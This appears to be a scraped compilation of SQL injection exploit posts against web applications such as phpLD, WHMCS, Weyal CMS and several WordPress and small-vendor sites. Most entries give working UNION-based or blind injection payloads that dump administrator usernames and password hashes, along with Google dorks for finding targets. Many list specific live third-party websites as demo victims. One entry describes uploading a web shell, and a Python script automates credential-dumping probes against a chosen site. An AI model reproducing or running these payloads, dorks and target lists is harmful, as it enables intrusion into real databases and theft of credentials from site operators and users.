phpld SQL Injection
fuzion/phpLD 3.3 Blind SQL Injection ( na)
phpLD 3.3 Blind SQL Injection
http://www.phplinkdirectory.com/
magic_quotes_gpc = Off
register_globals = On
Vulnerable:
GET http://site/phpld/page.php?name=
True Request:
(validpagename)' or 1=1#
False Request:
(validpagename)' or 1=0#
Try this (urlencode):
(validpagename)' or ORD(MID((SELECT PASSWORD FROM PLD_USER WHERE ID = 1),1,1))>1# etc...
Field value example:
{sha1}dd94709528bb1c83d08f3088d4043f4742891f4f
- Seasons Greetings -
- http://nukeit.org -
phpLD version 3.3 suffers from a remote blind SQL injection vulnerability.
fuzion/phpLD 3.3 (page.php name) Blind SQL Injection Vulnerability ( php)
# milw0rm.com [2008-12-23]
Fallaga/Craigslist Gold SQL Injection ( na)
# Exploit Title: Craigslist Clone Gold SQL injection Vulnerability
# Date: 04/05/2013
# Author: Fallaga
# Team: FaLLaGa Tunisian Hackers
# Script url: http://www.scriptcopy.com/craigslist-clone-script/Craiglist-Gold-4444.html
# Version: N/A
# Tested on: Demo
# CVE : ()
############################################################
#######################
#########################[ EXPL0!T ]#########################
http://exemple/classifieds2/?view=ads&catid=-1+union+select+concat(email,0x3a,code)+from+clf_ads--
#############################SwT 4 Ever##########################
####################
@JaMbA !! GreeTz: Fallaga Team + all tunisian people
Craigslist Clone Gold suffers from a remote SQL injection vulnerability.
XroGuE/Weyal CMS SQL Injection ( na)
================================================
Weyal Cms SQL Injection Vulnerability
================================================
#############################################################################
______ __ __ __ __ __ __ #
/\ _ \/\ \__/\ \__/\ \\ \ /\ \ /'__`\ __ #
\ \ \L\ \ \ ,_\ \ ,_\ \ \\ \ ___\ \ \/'\ /\_\L\ \ _ __ /\_\ _ __ #
\ \ __ \ \ \/\ \ \/\ \ \\ \_ /'___\ \ , < \/_/_\_<_/\`'__\ \/\ \/\`'__\ #
\ \ \/\ \ \ \_\ \ \_\ \__ ,__\/\ \__/\ \ \\`\ /\ \L\ \ \ \/ __\ \ \ \ \/ #
\ \_\ \_\ \__\\ \__\\/_/\_\_/\ \____\\ \_\ \_\ \____/\ \_\/\_\\ \_\ \_\ #
\/_/\/_/\/__/ \/__/ \/_/ \/____/ \/_/\/_/\/___/ \/_/\/_/ \/_/\/_/ #
#
[+] Site: http://tools.Att4ck3r.ir #
[+] Contact: xrogue_p3rsi4n_hack3r@hotmail.com #
#############################################################################
================================================
[-] Name: Weyal Cms SQL Injection Vulnerability
[-] Vendor: N/A
[-] Date: 2013-05-22
[-] Author: XroGuE
[-] Home: http://Att4ck3r.ir
================================================
[+] Dork: intext:"Designed by Rohi.af"
intext:"Designed by Dr. Weyal"
================================================
[+] Vulnerable Page: fullstory.php?id= , countrys.php?countryid= , "check Another pages :)"
[+] Vuln: www.[site].com/[path]/fullstory.php?id=SQLi
www.[site].com/[path]/countrys.php?id=SQLi
[+] Demo: http://mysurgery.ru/fullstory.php?id=-999 union all select 1,2,version(),user(),database(),6
[+] Demo: http://www.s-rohi.com/fullstory.php?id=-999 UNION SELECT 1,2,version(),database(),5,6,7,8,9,10,11,12,13,14
[+] Demo: http://www.vegos.ru/countrys.php?countryid=-999 union all select 1,version(),database()
================================================
Weyal CMS suffers from a remote SQL injection vulnerability. Note that this finding has site-specific information.
Jason Whelan/Speck CMS SQL Injection ( na)
Author: Jason Whelan
PacketStorm: exploitdev
Email: exploitdevj@gmail.com
Target Software: Speck CMS Framework, Latest
Vendor URL: http://www.speckcms.org/
Multiple SQL Injection Vulnerabilities
Examples:
portal/user.cfm:
<cfquery name="qUser" datasource="#request.speck.codb#">
SELECT * FROM spUsers WHERE username = '#url.username#'
</cfquery>
portal/group.cfm:
<cfquery name="qGroup" datasource="#request.speck.codb#">
SELECT * FROM spGroups WHERE groupname = '#url.groupname#'
</cfquery>
Many more exist in this CMS framework. Exploitation will depend on the use
of these files within the user's CMS.
Speck CMS suffers from multiple remote SQL injection vulnerabilities. The latest framework as of 05/02/2013 is affected.
Fallaga/Craigslist Gold - SQL Injection Vulnerability ( php)
Ebrahim Hegazy/Yahoo! TW YSM MKT Blind SQL Injection ( na)
Title:
======
Yahoo! TW YSM MKT - Blind SQL Injection Vulnerability
Date:
=====
2013-04-03
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=892
VL-ID:
=====
892
Common Vulnerability Scoring System:
====================================
7.1
Introduction:
=============
Yahoo! Inc. is an American multinational internet corporation headquartered in Sunnyvale, California. It is widely
known for its web portal, search engine Yahoo! Search, and related services, including Yahoo! Directory, Yahoo! Mail,
Yahoo! News, Yahoo! Finance, Yahoo! Groups, Yahoo! Answers, advertising, online mapping, video sharing, fantasy sports
and its social media website. It is one of the most popular sites in the United States. According to news sources,
roughly 700 million people visit Yahoo! websites every month. Yahoo! itself claims it attracts "more than half a
billion consumers every month in more than 30 languages."
(Copy of the Vendor Homepage: http://www.yahoo.com )
Abstract:
=========
An independent researcher (Ebrahim Hegazy) discovered a blind sql injection vulnerability in the Yahoo! Inc TW Marketing Service Application.
Report-Timeline:
================
2013-02-24: Researcher Notification & Coordination
2013-02-25: Vendor Notification
2013-03-01: Vendor Response/Feedback
2013-04-01: Vendor Fix/Patch by check
2013-04-03: Public Disclosure
Status:
========
Published
Exploitation-Technique:
=======================
Remote
Severity:
=========
Critical
Details:
========
A time-based blind SQL injection web vulnerability is detected in the official Yahoo! TW YSM Marketing Application Service.
The vulnerability allows remote attackers to inject their own SQL commands to compromise the affected application DBMS.
The SQL injection vulnerability is located in the index.php file of the soeasy module when processing requests with manipulated
scId parameters. By manipulating the scId parameter, attackers can inject their own SQL commands to compromise the web server
application DBMS.
The vulnerability can be exploited by remote attackers without a privileged application user account and without required
user interaction. Successful exploitation of the SQL injection vulnerability results in application and application
service DBMS compromise.
Vulnerable Service(s):
[+] Yahoo! Inc - TW YSM Marketing
Vulnerable Module(s):
[+] soeasy
Vulnerable File(s):
[+] index.php
Vulnerable Parameter(s):
[+] scId
Proof of Concept:
=================
The time-based SQL injection web vulnerability can be exploited by remote attackers without a privileged application user account and without
required user interaction. For demonstration or to reproduce ...
Vulnerable Service Domain: tw.ysm.emarketing.yahoo.com
Vulnerable Module: soeasy
Vulnerable File: index.php
Vulnerable Parameters: ?p=2&scId=
POC:
http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=2&scId=113; select SLEEP(5)--
Payload:
1; union select SLEEP(5)--
Request:
http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=2&scId=113;%20select%20SLEEP(5)--
GET /soeasy/index.php?p=2&scId=113;%20select%20SLEEP(5)-- HTTP/1.1
Host: tw.ysm.emarketing.yahoo.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: is_c=1; device=pc; showNews=Y; B=9tgpb118ilu04&b=3&s=mu; AO=o=1&s=1&dnt=1; tw_ysm_soeasy=d%3D351d9185185129780476f856.
17880929%26s%3DxLxK2mb96diFbErWUyv_jGQ--; __utma=266114698.145757337399.1361672202.1361672202.1361672202.1; __utmb=2663114698.
1.10.1361672202; __utmc=2636114698; __utmz=266114698.13616732202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
DNT: 1
Connection: keep-alive
HTTP/1.0 200 OK
Date: Sun, 24 Feb 2013 02:16:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi
SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, private
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Note:
Since it is a time-based blind injection, the page will not show any output in the reply, but it will SLEEP/DELAY for 5 seconds before it loads.
Solution:
=========
The vulnerability can be patched by restricting and securely parsing the scId parameter of the request.
Risk:
=====
The security risk of the time based blind sql injection web vulnerability is estimated as critical.
Credits:
========
Vulnerability Laboratory [Research Team] - Ebrahim Hegazy [hegazy@vulnerability-lab.com] (research@vulnerability-lab.com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
Copyright © 2013 | Vulnerability Laboratory
--
VULNERABILITY RESEARCH LABORATORY
LABORATORY ADMINISTRATION
CONTACT: admin@vulnerability-lab.com
Yahoo! TW YSM MKT suffered from a remote blind SQL injection vulnerability.
Ahmed Aboul-Ela/WHMCS 4.5.2 SQL Injection ( na)
# Title: WHMCS 4.x SQL Injection Vulnerability
# Google Dork: intext:"Powered by WHMCompleteSolution" OR inurl:"submitticket.php"
# Author: Ahmed Aboul-Ela
# Contact: Ahmed.Aboul3la[at]gmail[dot]com
# Date: 14/5/2013
# Vendor: http://www.whmcs.com
# Version: 4.5.2 and prior versions should be affected too
# Tested on: Linux
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sql Injection Vulnerability in "/includes/invoicefunctions.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Vulnerable Code Snippet :
LINE 582: function pdfInvoice($id)
LINE 583: {
LINE 686: if ($CONFIG['GroupSimilarLineItems'])
LINE 687: {
LINE 688: $result = full_query('' . 'SELECT COUNT(*),id,type,relid,description,amount,taxed FROM tblinvoiceitems WHERE invoiceid=' . $id . ' GROUP BY `description`,`amount` ORDER BY id ASC');
LINE 689: }
As we can see here, the $id argument of the pdfInvoice function is used directly in the MySQL query without any sanitization, which leads directly to SQL injection.
It appears that the pdfInvoice function is called from the "/dl.php" file as follows:
LINE 21: if ($type == 'i')
LINE 22: {
LINE 23: $result = select_query('tblinvoices', '', array(
LINE 24: 'id' => $id
LINE 25: ));
LINE 26: $data = mysql_fetch_array($result);
LINE 27: $invoiceid = $data['id'];
LINE 28: $invoicenum = $data['invoicenum'];
LINE 29: $userid = $data['userid'];
LINE 30: if ((!$_SESSION['adminid'] && $_SESSION['uid'] != $userid))
LINE 31: {
LINE 32: downloadLogin();
LINE 33: }
LINE 34: if (!$invoicenum)
LINE 35: {
LINE 36: $invoicenum = $invoiceid;
LINE 37: }
LINE 38: require('includes/clientfunctions.php');
LINE 39: require('includes/countries.php');
LINE 40: require('includes/invoicefunctions.php');
LINE 41: require('includes/tcpdf.php');
LINE 42: $pdfdata = pdfInvoice($id);
LINE 43: header('Pragma: public');
LINE 44: header('Expires: Mon, 26 Jul 1997 05:00:00 GMT');
LINE 45: header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT');
LINE 46: header('Cache-Control: must-revalidate, post-check=0, pre-check=0, private');
LINE 47: header('Cache-Control: private', false);
LINE 48: header('Content-Type: application/octet-stream');
LINE 49: header('Content-Disposition: attachment; filename="' . $invoicenum . '.pdf"');
LINE 50: header('Content-Transfer-Encoding: binary');
LINE 51: echo $pdfdata;
LINE 52: exit();
LINE 53: return 1;
LINE 54: }
As we can see at LINE "42", the pdfInvoice function is called with the $id variable passed in without any sanitization.
Afterwards it forces the browser to download the generated invoice in PDF format.
- Proof of Concept for Exploitation
To Dump Administrator Credentials (user & pass):
http://www.site.com/whmcs/dl.php?type=i&id=1 and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins --
~ Result: The browser will prompt to download the PDF invoice file; after opening it you should find the username and password hash there :)
- Precondition to Successfully Exploit the Vulnerability:
"Group Similar Line Items" Option should be Enabled at the Invoices Settings in the WHMCS Admin ( It should be Enabled by default )
- Credits:
Ahmed Aboul-Ela - Information Security Consultant @ Starware Group
WHMCS version 4.5.2 suffers from a remote SQL injection vulnerability.
Ashiyane Digital Security Team/Beat Websites 1.5 SQL Injection ( na)
##############
# Exploit Title : Beat Websites CMS SQL Injection #
# Exploit Author : Ashiyane Digital Security Team #
# vendor Home : http://www.beatwebsites.com/ #
# Home : www.Ashiyane.org #
# Security Risk : Medium #
# Version : 1.5 #
# Dork : "Powered by: Beat Websites" inurl:beats.php?gid= #
##############
#Location : site/beats.php?gid=[SQL]
#
#Dem0:
# http://24hrbeats.com/beats.php?gid=1%27
# http://www.rocbeats.com/beats.php?gid=10%27
# http://beatsbyyou.com/beats.php?gid=8%27
# http://beatfaktory.com/beats.php?gid=20%27
# http://www.hiphopbeatfactory.com/beats.php?gid=6%27
# http://multiplatinumproducers.com/beats.php?gid=11%27
# http://www.icebergbeats.net/beats.php?gid=4%27
##############
#Greetz to: My Lord ALLAH
##############
#
# Amirh03in
#
##############
Beat Websites version 1.5 suffers from a remote SQL injection vulnerability. Note that this advisory has site-specific information.
Ashiyane Digital Security Team/Wordpress Flagallery-Skins SQL Injection ( na)
##############
# Exploit Title : Wordpress Flagallery-skins plugin SQL Injection #
# Exploit Author : Ashiyane Digital Security Team #
# Home : www.ashiyane.org #
# Security Risk : Medium #
# Dork : inurl:/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist= #
# Tested on: Linux #
##############
#Location: site/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=[SQL]
#
#DEm0:
# http://www.argomentitessili.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=my-playlist%27
#
# http://kiwirootsmusic.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=recordings%27
#
# http://www.buritacaworldbeat.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=burisongs%27
#
# http://www.unclebobsrockshop.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=songs%27
#
# http://headingtoawedding.ca/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=homepage%27
#
##############
#Greetz to: My Lord ALLAH
##############
#
# Amirh03in
#
##############
Wordpress Flagallery-skins plugin suffers from an SQL Injection vulnerability. Note that this advisory has site-specific information.
Ashiyane Digital Security Team/Iron Lava Corp Shell Upload / SQL Injection ( na)
##############
# Exploit Title : Iron Lava Corp SQL Injection / SHell upload #
# Exploit Author : Ashiyane Digital Security Team #
# vendor home : http://www.ironlava.com/ #
# Home : www.ashiyane.org #
# Security Risk : High #
# Dork : "Site Design by Iron Lava Corp." inurl:index.php?pid= #
##############
#Location: site/index.php?pid=[SQL]
#
#DEm0:
# http://www.efcaviation.ca/index.php?pid=-61%20union%20select%201,2,3,4,5,6,7,8,9,10,11,group_concat%28table_name%29,13,14,15%20from%20information_schema.tables%20where%20table_schema=0x65666364657663616462%23
#
# http://fourleg.com/index.php?pid=20%27
#
# http://www.caninefitness.com/index.php?pid=8%27
#
# http://www.bloomfunds.ca/index.php?pid=19%27
#################################################
#admin panel : site/admin
###############################################
# For Upload shell #
# after login go to MANAGE IMAGES And upload your shell
# and open your shell : site/images/shell.php
#
#GOOD luck :D
#
##############
#Greetz to: My Lord ALLAH
##############
#
# Amirh03in
#
##############
Sites designed by Iron Lava Corp suffer from remote shell upload and remote SQL injection vulnerabilities. Note that this advisory has site-specific information.
NoGe/ZAPms 1.41- SQL Injection Vulnerability ( php)
=============================================================================================================
[o] ZAPms <= SQL Injection Vulnerability
Software : ZAPms
Version : 1.41
Vendor : http://www.zapms.de
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Desc : ZAPms is a free open source web content management system,
adapted to the needs of businesses on the Internet.
ZAPms offers many features and modules as well as an extension interface for maximum capabilities.
=============================================================================================================
[o] Exploit
http://localhost/[path]/products?pid=[SQLi]
=============================================================================================================
[o] PoC
http://server/products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,version(),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product
=============================================================================================================
[o] Greetz
Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
aJe kaka11 matthews wishnusakti inc0mp13te martfella
pizzyroot Genex H312Y noname tukulesto }^-^{
=============================================================================================================
[o] April 09 2013 - Papua, Indonesia
baltazar/IT Media SQL Injection Exploit ( na)
#!/usr/bin/python
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# !!! Special thanx for d3hydr8 and rsauron who inspired me !!!
#
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --- d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu #
# --- QKrun1x - skillfaker - Croathack - Optyx - Nuclear #
# --- Eliminator and to all members of darkc0de and ljuska.org# #
################################################################
# Python 2 script (print statements, urllib2, httplib); indentation restored.
import sys, os, time, re, urllib2, httplib, socket

# Clear the terminal in a platform-dependent way.
if sys.platform == 'linux' or sys.platform == 'linux2':
    clearing = 'clear'
else:
    clearing = 'cls'
os.system(clearing)

proxy = "None"
count = 0

# Usage banner when called with no target or too many arguments.
if len(sys.argv) < 2 or len(sys.argv) > 4:
    print "\n|---------------------------------------------------------------|"
    print "| b4ltazar[@]gmail[dot]com |"
    print "| 01/2009 ITmedia |"
    print "| Help: itmedia.py -h |"
    print "| Visit www.darkc0de.com and www.ljuska.org |"
    print "|---------------------------------------------------------------|\n"
    sys.exit(1)

# Parse -h (help) and -p <host:port> (HTTP proxy) from the command line.
for arg in sys.argv:
    if arg == '-h':
        print "\n|-------------------------------------------------------------------------------|"
        print "| b4ltazar[@]gmail[dot]com |"
        print "| 01/2009 ITmedia |"
        print "| Usage: itmedia.py www.site.com |"
        print "| Example: itmedia.py http://www.blagoleks.net |"
        print "| Visit www.darkc0de.com and www.ljuska.org |"
        print "|-------------------------------------------------------------------------------|\n"
        sys.exit(1)
    elif arg == '-p':
        proxy = sys.argv[count+1]
    count += 1

# Normalise the target URL: add scheme and trailing slash if missing.
site = sys.argv[1]
if site[:4] != "http":
    site = "http://"+site
if site[-1] != "/":
    site = site+"/"

# Candidate injection paths; each embeds the marker 0x62616c74617a6172 ("baltazar")
# so a successful UNION is detected by searching the response for that string.
vulnsql = [
    "vijest.php?id=-1+union+all+select+1,concat_ws(char(58),user,pass,0x62616c74617a6172),3,4,5,6,7+from+admin--",
    "vijesti.php?id=-1+union+all+select+1,2,concat_ws(char(58),user,pass,0x62616c74617a6172)+from+admin--",
    "vijest.php?id=-1+union+all+select+1,2,concat_ws(char(58),user,pass,0x62616c74617a6172),4,5,6,7,8,9,10+from+admin--",
    "galerija.php?op=slika&ids=-1+union+all+select+1,null,concat_ws(char(58),user,pass,0x62616c74617a6172)+from+admin--",
    "galerija.php?op=slika&ids=-1+union+all+select+1,null,concat_ws(char(58),user,pass,0x62616c74617a6172),4,5+from+admin--",
    "ponuda.php?op=slika&ids=-1+union+all+select+1,concat_ws(char(58),user,pass,0x62616c74617a6172),3+from+admin--",
    "ponuda.php?op=kategorija&id=-1+union+all+select+1,2,concat_ws(char(58),user,pass,0x62616c74617a6172),4+from+admin--",
    "slike.php?op=slika&ids=-1+union+all+select+1,2,concat_ws(char(58),user,pass,0x62616c74617a6172),4,5+from+admin--"
]

print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 01/2009 ITmedia |"
print "| Visit www.darkc0de.com and www.ljuska.org |"
print "|---------------------------------------------------------------|\n"
print "\n[-] %s" % time.strftime("%X")

socket.setdefaulttimeout(20)

# Verify the proxy (if given) by connecting to it and fetching a known page through it.
try:
    if proxy != "None":
        print "[+] Proxy:",proxy
        print "\n[+] Testing Proxy..."
        pr = httplib.HTTPConnection(proxy)
        pr.connect()
        proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
        proxyfier = urllib2.build_opener(proxy_handler)
        proxyfier.open("http://www.google.com")
        print
        print "\t[!] w00t!,w00t! Proxy: "+proxy+" Working"
        print
    else:
        print "[-] Proxy not given"
        print
        # No proxy: an empty ProxyHandler is a valid handler for build_opener()
        # (the original assigned "" here, which build_opener rejects with TypeError).
        proxy_handler = urllib2.ProxyHandler({})
except(socket.timeout):
    print
    print "\t[-] Proxy Timed Out"
    print
    sys.exit(1)
except Exception, msg:
    # Original read "except(),msg:", which catches nothing in Python 2.
    print msg
    print "\t[-] Proxy Failed"
    print
    sys.exit(1)

try:
    url = "http://antionline.com/tools-and-toys/ip-locate/index.php?address="
except(IndexError):
    print "[-] Wtf?"

# Print the external IP/location line returned by the lookup service.
proxyfier = urllib2.build_opener(proxy_handler)
proxy_check = proxyfier.open(url).readlines()
for line in proxy_check:
    if re.search("<br><br>", line):
        line = line.replace("</b>","").replace('<br>',"").replace('<b>',"")
        print "\n[!]",line,"\n"

print "[+] Target:",site
print "[+]",len(vulnsql),"Vulns loaded..."
print "[+] Starting Scan..\n"

# Request each candidate path and look for the marker string in the response.
for sql in vulnsql:
    print "[+] Checking:",site+sql.replace("\n","")
    print
    try:
        source = proxyfier.open(site+sql.replace("\n", "")).read()
        search = re.findall("baltazar",source)
        if len(search) > 0:
            print "[!] w00t!w00t" ,site+sql.replace("\n", "")
            print
    except(KeyboardInterrupt, SystemExit):
        raise
    except:
        pass

print
print
print
print """\tDork : inurl:/galerija.php?op=slika
inurl:/ponuda.php?op=slika
inurl:/vijest.php?id= intext:itmedia
inurl:/slike.php?op=slika
"""
print
print "Check for more details: http://packetstormsecurity.org/0808-exploits/itmedia-sql.txt"
print "\n[-] %s" % time.strftime("%X")
Remote SQL injection exploit for IT Media.
tempe_mendoan/Venetaweb SQL Injection ( na)
.___ .___ .__
| | ____ __| _/ ____ ____ ____ ______|__|_____
| | / \ / __ | / _ \ / \ _/ __ \ / ___/| |\__ \
| || | \/ /_/ | ( <_> )| | \\ ___/ \___ \ | | / __ \_
|___||___| /\____ | \____/ |___| / \___ >/____ >|__|(____ /
\/ \/ \/ \/ \/ \/
[~]===========================================================================[~]
[~]Title : Venetaweb SQL Injection
[~]Vendor : http://www.venetaweb.it/
[~]Author : tempe_mendoan
[~]Google Dork : "Web powered by Venetaweb"
[~]===========================================================================[~]
#################################################################################
===[ Exploit ]===
[»] http://localhost/photogallery.php?id=[SQL]
[»] http://localhost/products_category.php?id=[SQL]
[»] http://localhost/prodotto.php?id=[SQL]
##################################################################################
##################################################################################
===[ Admin Login ]===
[+] http://localhost/admin_login.php
##################################################################################
Greats T0 :
./ And All My Friend
Note :
./ I Love You Dila :*
Venetaweb suffers from a remote SQL injection vulnerability.
the_cyber_nuxbie/EDinteractive SQL Injection ( na)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>> Exploit database separated by exploit type (local, remote, DoS, etc.)
[+] Official Website: http://www.1337day.com
[+] Support E-mail : mr.inj3ct0r[at]gmail.com
##########################################
I'm NuxbieCyber Member From Inj3ct0r Team
##########################################
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
========================================================================
<<<|>>> EDinteractive - SQL Injection Vulnerability <<<|>>>
========================================================================
- Discovered By:
||| TheCyberNuxbie - Independent Security Research |||
<<< staff@thecybernuxbie.com >>>
CP: +62856-2538-963 $ YM: nux_exploit
Credit : Catur Febrian [ nuxbie ]
- Info WebApps:
This Content Develop By EdInteractive:
© 2012 EDinteractive - Web development and Content Management Systems
T: 0161 295 4127 | E: info@edinteractive.co.uk
http://edinteractive.co.uk/pages/portfolio.php?t=website_advanced
- Google Dork:
intext:"Site by EDinteractive"
intext:"Site developed by EDinteractive"
- Exploit Concept:
http://lokalisasi/WebApps/index.php?id=[SQL Injection]
- Sample WebApps Vuln SQLi:
http://sportstockport.org.uk/cms/news/article/index.php?id=63' + [SQL Injection]
http://quantumenquiries.com/cms/news/article/?id=19' + [SQL Injection]
http://tenants-hall.co.uk/cms/news/article/?id=14' + [SQL Injection]
http://afemaichildrenstrust.org.uk/cms/news/article/?id=36' + [SQL Injection]
http://elie-project.eu/cms/news/article/?id=13' + [SQL Injection]
http://ece.salford.ac.uk/cms/news/article/?id=26' + [SQL Injection]
http://ngtc.co.uk/cms/news/article/?id=51' + [SQL Injection]
http://digital.salford.ac.uk/cms/news/article/?id=78' + [SQL Injection]
http://ourmiddleton.org.uk/cms/news/article/?id=80' + [SQL Injection]
http://healthforall.org.uk/cms/news/article/?id=34' + [SQL Injection]
http://bann.org.uk/cms/news/article/?id=67' + [SQL Injection]
http://ktp.salford.ac.uk/cms/news/article/?id=109' + [SQL Injection]
http://nnbg.org.uk/web/news/article/?id=55' + [SQL Injection]
, And Many More @ Google...!!!
[x] Greetz,,,
*** 1337day Inj3ct0r TEAM ***
...:::' All Member & Staff Inj3ct0r TEAM ':::...
- Special Thanks: Alloh SWT (GOD)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
I want to go to college, but I don't have the money... Sorry, this exploit has become the place where I vent...
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[ Inj3ct0r | PacketStromSecurity | Exploit-DB ]
Me @ Solo Raya, 15 March 2012 @ 07:46 PM. Central Java, Indonesian.
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
EDinteractive suffers from a remote SQL injection vulnerability.